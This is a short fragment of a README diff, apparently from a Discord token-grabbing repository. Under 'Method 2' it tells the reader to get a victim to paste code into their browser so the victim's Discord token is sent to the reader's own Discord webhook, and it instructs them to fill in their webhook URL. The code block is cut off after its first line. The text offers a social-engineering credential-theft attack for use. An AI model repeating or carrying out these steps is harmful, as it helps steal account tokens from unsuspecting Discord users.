ZakuroSoda/Discord-Matters/README.md

 - Method 2:

 Get user to copy and paste this code into browser and token will be automatically sent back to you via discord webhook.
+Replace ```YOUR DISCORD WEBHOOK HERE``` with your discord webhook URL.

 ```
 location.reload();